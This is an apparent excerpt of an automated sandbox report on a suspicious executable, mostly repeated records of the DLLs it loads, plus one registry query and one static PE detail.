Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
Source: Z8eHwAvqAh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
